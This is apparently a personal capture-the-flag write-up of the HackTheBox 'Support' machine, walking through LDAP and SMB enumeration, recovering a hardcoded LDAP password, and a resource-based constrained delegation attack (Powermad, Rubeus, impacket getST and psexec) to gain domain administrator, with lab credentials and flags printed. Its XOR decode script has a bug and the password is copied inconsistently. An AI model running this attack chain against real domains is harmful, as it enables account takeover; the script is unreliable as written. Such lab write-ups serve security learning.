Support

Enumeration

NMAP Scan

NMAP Showing ldap - domain - kerberos

What is our deduction based on these information:

  1. This box could be domain controller [Because there is kerberos-sec]

  2. we can enumerate ldap to find information

  3. We can create a session using msrpc - possible reverse shell

Priorities for enumeration:

  1. SMB - Shares and login access (will use smbclient, crackmapexec)

  2. LDAP - (nmap script - windapsearch.py)

  3. Kerberos -

  4. DNS: Ensure you add the DNS to the /hosts file

  5. RPC - Possible WinRM?

Enumeration Goal:

  • Credentials

  • Anonymous access

  • Net-Shares

  • Null sessions

  • Login default passwords


ICE BREAKER!

Ice Breaker!

LDAP

What is LDAP?

LDAP is a lightweight directory access protocol (LDAP) that helps users find information/data about the organisations, personel and other relevant information in a server. The goals of LDAP is devided into two. 

It is to store information/data in the directory and the second one is to authenticate its users to access the directory

How to enumerate LDAP?

┌──(bsail㉿hackOn)-[~/Desktop/HTB/normal_boxes/Support]
└─$ nmap -n -sV --script "ldap*" 10.10.11.174 -Pn
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-07 15:28 AEST
NSE: [ldap-brute] passwords: Time limit 10m00s exceeded.

Nmap scan report for 10.10.11.174
Host is up (0.024s latency).
Not shown: 990 filtered tcp ports (no-response)
Bug in ldap-brute: no string output.
Bug in ldap-brute: no string output.
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-10-07 05:29:06Z)
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb, Site: Default-First-Site-Name)
| ldap-rootdse: 
| LDAP Results
|   <ROOT>
|       domainFunctionality: 7
|       forestFunctionality: 7
|       domainControllerFunctionality: 7
|       rootDomainNamingContext: DC=support,DC=htb
|       ldapServiceName: support.htb:dc$@SUPPORT.HTB
|       isGlobalCatalogReady: TRUE

|       subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=support,DC=htb
|       serverName: CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=support,DC=htb
|       schemaNamingContext: CN=Schema,CN=Configuration,DC=support,DC=htb
|       namingContexts: DC=support,DC=htb
|       namingContexts: CN=Configuration,DC=support,DC=htb
|       namingContexts: CN=Schema,CN=Configuration,DC=support,DC=htb
|       namingContexts: DC=DomainDnsZones,DC=support,DC=htb
|       namingContexts: DC=ForestDnsZones,DC=support,DC=htb
|       isSynchronized: TRUE
|       highestCommittedUSN: 82028
|       dsServiceName: CN=NTDS Settings,CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=support,DC=htb
|       dnsHostName: dc.support.htb
|       defaultNamingContext: DC=support,DC=htb
|       currentTime: 20231007053907.0Z
|_      configurationNamingContext: CN=Configuration,DC=support,DC=htb
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb, Site: Default-First-Site-Name)
| ldap-rootdse: 
| LDAP Results
|   <ROOT>
|       domainFunctionality: 7
|       forestFunctionality: 7
|       domainControllerFunctionality: 7
|       rootDomainNamingContext: DC=support,DC=htb
|       ldapServiceName: support.htb:dc$@SUPPORT.HTB
|       isGlobalCatalogReady: TRUE
|      
|       subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=support,DC=htb
|       serverName: CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=support,DC=htb
|       schemaNamingContext: CN=Schema,CN=Configuration,DC=support,DC=htb
|       namingContexts: DC=support,DC=htb
|       namingContexts: CN=Configuration,DC=support,DC=htb
|       namingContexts: CN=Schema,CN=Configuration,DC=support,DC=htb
|       namingContexts: DC=DomainDnsZones,DC=support,DC=htb
|       namingContexts: DC=ForestDnsZones,DC=support,DC=htb
|       isSynchronized: TRUE
|       highestCommittedUSN: 82028
|       dsServiceName: CN=NTDS Settings,CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=support,DC=htb
|       dnsHostName: dc.support.htb
|       defaultNamingContext: DC=support,DC=htb
|       currentTime: 20231007053907.0Z
|_      configurationNamingContext: CN=Configuration,DC=support,DC=htb
3269/tcp open  tcpwrapped
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

I used NMAP script to enumerate LDAP - or you can use: - https://github.com/ropnop/windapsearch/blob/master/README.md

Using windapsearch.py

Im unsure if I did this correctly but it wasnt much of help.

Moving forward to SMB.

Enumerating SMB

Crackmapexec

Attempt to check if CME will work on the target

As per the photo above it seems there is a DC on port 445 with a share drive \D: that we could potentially check and identify. Lets check using --shares to see if there are more shares we can obtain.

enum4linux information

I tried running #enum4linux and I noticed that in the password policy there are some errors looking for a session request. I am guessing that there could be a possible credential that we can find inside this share drive.

Using Smbclient to access shares.

Smbclient

Going through all the trouble of searching the smbclient, and trying to make the smbclient work after so many forum dives. I manage to check the /support-tools share. From here I downloaded the binaries and .zip files into my Kali box and started playing with them. The next goal is to enumerate the .exe and .zip folders in a Windows box

Windows Enumeration

Moving forward: We will move into a Windows box with the following tools on hand.

  1. DNSpy.exe

  2. good ol POWERSHELL

Executing UserInfo.exe

  1. If you execute the binary without its supporting environment in the same directory, you will obtain this result instead (From 0xdF guide).

  1. The correct way of executing it:

Using windows I run to a couple of issues:

  1. Openvpn from HTB will have issues accepting the certificate and it took me quite a while to figure out so I decided with the time constrains I have I needed to find other ways.

  2. I realised that I only needed the binary to run, so I could potentially identify the user. If there are other ways I could do this I could maybe query it better.

Work around:

  1. Decided to find other emulators in Linux that can run the binary.

  2. I found mono & wine.

  3. wine64 have issues and requires other dependency on my own client, again with time constraints I have I decided to use mono and it seems to work fine

Obtaining User Credentials

Tools:

  • Mono: a windows binary emulator

  • Responder

Strategy of this technique will include:

sudo responder -A -v -I eth0
Set-up our own IP to be connected with the DNS

Before we being ensure that you change the support dns IP to your own IP, so that responder can work with the given eth0.

It is ideal to begin setting up your responder proxy, and wait for further request from your exe.

Ones the program is set, use "mono" and follow the scenario.

As you are playing with the executable do not forget to check the proxy results as the binary will try to request to the server to find the given parameters. With this technique the requests are not encrypted through out the conversation and you will be able to see the plaintext password.

Note that this can also be done using Wireshark.

Password: nvEfEk16^1aM4$e7AclUf8x$tRWxOW91%lmz

Password LDAP Decryption Script

The second way to obtain the password is to convert the obtained script from DNspy using a scripting language.

import base64 

#Variable Set up
enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E"
_key = "armando"


#Use byte array and then use the base64 decode function 
decode_this = bytearray(base64.b64decode(enc_password))

#Use for loop to decode the variable using each key for the XOR operation
for x in range(len(decode_this)):
    decode_this[x] ^= ord(_key[i % len(_key)])^223

#Print Decoded Value
decoded_pass = decode_this.decode()

print(decoded_pass)

Result:

Moving to the ldap research.

Point to note: There are other ways to obtain the password, and there are multiple ways to decode it using a script. I am by no means a master and it took me a few couple good days researching how base64 and XOR work to decode this.

Calling ldap using ldapresearch using the obtained password

Tools used:

ldapsearch

ldapdomaindump

Goal:

  1. Look for a credential

  2. Look for a password

I was having a hard time using the actual tool, it took me like atleast a couple of hours to figure out if the network VPN was broken, or am I just having a brain fart for not figuring why the LDAP could not bind however with the screen shot below, reversing the order does miracles and work. I found the solution on a specific website and I will post the link below.

Using the ldap query below I manage to look at the ldap information and the users that are on the server.

The result is a large group of text so I will process this
ldapsearch -x -b "DC=support,DC=htb" -H "ldap://support.htb" -D "support\ldap" -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz'

To validate this, we will use ldapdomaindump

ldapdomaindump ldap://support.htb -u "support\\ldap" -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' 

After the request you will recieve multiple files which includes:

  • HTML

  • JSON

  • GREP

Since Im super lazy I spun a quick python3 server in the directory and started browsing/enumerating the dump files.

Example of Python3 server Set up:

Here you can see the requests that I am making using my browser

Credential Hunting

So looking at the files that was obtained from the dump I quickly checked the domain users section as they usually have something interesting happening.

Found out that Support is a user aswell

Expanding on "Support" credential

As we are searching for more information about support we found that it has a "Remote Management Users", "Shared Support Account" priv in it. BINGO! That is our username.

Looking for password

Obtained from domain_users.json (After hours and hours of search)...

Credentials For Reverse Shell

Username: support
Passoword: "Ironside47pleasure40Watchful"

Reverse Shell

Rev Shell
User.txt
d9e79134f2ed503af804ed93b84d0842

Priv Escalation Enumeration

Enumerate Remote Box (For more information)

Tools:

  1. Sharphound

  2. BloodHound

Uploaded SharpHound to the box:

This directory contains most of my Tools for WIndows Enum

So on the screenshot below, you will see the infortmation that the SharpHound executed with, and make sure to download the file and upload to your BloodHound

Upload the result of the Blood Hound to find a node called SHARED.DC.SUPPORT.HTB, this node has a "Generic All" permissions with is prettyt much similar to a READ-WRITE-EXECUTE permission level over the DC.SUPPORT.HTB.

Taking ## ROOT ##

TOOLS:

Powerview.ps1 Powermad.ps1 Rubeus.exe

Credit to CyberGladius For the PrivEsc walkthrough, I tried to do it on my own however im not capable enough to do the AD Priv Esc area. I learned quit a few techniques along the way and I changed some path ways that I felt comfrotable doing.

#Set-Variable -Name "UnknownPC" -Value "NotTrue"
#Set-Variable -Name "target_PC" -Value "DC"

#Add Fake PC object to AD
New-MachineAccount -MachineAccount (Get-Variable -Name "UnknownPC").Value -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose




#Get SID - TargetPC
Get-DomainComputer "target_PC" | select -expand objectsid

Account(For Hashing)
UnknownPC
123456

Double check if fake computer is made

#Give OBJ PC the Constrained Delegation Priv
Set-ADComputer (Get-Variable -Name "target_PC").Value -PrincipalsAllowedToDelegateToAccount ((Get-Variable -Name "UnknownPC").Value + '$')

#Check for ACL Info
##Ignore::(Get-Acl -Path "AD:DC=SUPPORT,DC=HTB").Access | where-Object {$_.IdentityReference -Like "support\NotTrue"}


#Check for last command
Get-ADComputer (Get-Variable -Name "targetComputer").Value -Properties PrincipalsAllowedToDelegateToAccount
To validate the command and check more information towards the Delegation

Rubeus.exe


./Rubeus.exe hash /password:123456 /user:NotTrue$ /domain:support.htb
// Some code
####KALI SIDE/ATTACKER SIDE####

Create TGT Key from Kerberos request: Req a new TGT from 'dc.support.htb' - We are currently faking that we are the "administrator" 

python3 getST.py support.htb/NotTrue -dc-ip dc.support.htb -impersonate administrator -spn http/dc.support.htb -aesKey 35968C91CF211A48166F61C736CAE5BB2DD4E0F7DA1248D082C31854879BDAFB

# Change the local var to KERB5CCNAME && pass the ccahe TGT to the requested service.
export KRB5CCNAME=administrator.ccache

# Use psexec.py to connect with the TGT we just made to the server as the user administrator 

KRB5CCNAME=administrator.ccache 

psexec.py support.htb/administrator@dc.support.htb -k -no-pass

ROOT FLAG

5ca52128d3643189ae27366111a51d37

BEYOND ROOT (TBA)1

Resources

Last updated